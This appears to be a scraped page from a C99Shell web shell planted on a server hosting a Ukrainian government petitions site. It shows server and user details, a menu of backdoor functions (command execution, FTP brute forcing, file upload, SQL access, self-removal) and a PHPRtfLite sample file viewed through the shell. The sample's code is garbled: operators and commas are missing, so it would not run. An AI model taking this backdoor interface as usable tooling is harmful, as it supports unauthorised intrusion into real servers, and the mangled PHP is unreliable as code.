!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/petitions.zt-rada.gov.ua/alien/phprtflite/samples/   drwxr-xr-x
Free 106.94 GB of 200.55 GB (53.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     merged_cells.php (1.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

// register PHPRtfLite class loader
require '../lib/PHPRtfLite.php';

PHPRtfLite::registerAutoloader();
$rtf = new PHPRtfLite();
$sect $rtf->addSection();

$table $sect->addTable();

$table->addRows(50.75);
$table->addColumnsList(array(33333));

$table->mergeCellRange(1131);
$table->writeToCell(11'Vertical merged cells.', new PHPRtfLite_Font(), new PHPRtfLite_ParFormat());
$border PHPRtfLite_Border::create(1'#ff0000');
$table->setBorderForCellRange($border1131);

$table->mergeCellRange(1315);
$table->writeToCell(13'Horizontal merged cells', new PHPRtfLite_Font(), new PHPRtfLite_ParFormat());
$border PHPRtfLite_Border::create(1'#0000ff');
$table->setBorderForCellRange($border1315);

$table->mergeCellRange(3355);
$table->writeToCell(33'Horizontal and vertical merged cells', new PHPRtfLite_Font(), new PHPRtfLite_ParFormat());
$border PHPRtfLite_Border::create(1'#00ff00');
$table->setBorderForCellRange($border3355);

// send to browser
$rtf->sendRtf('merged_cells.rtf');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0104 ]--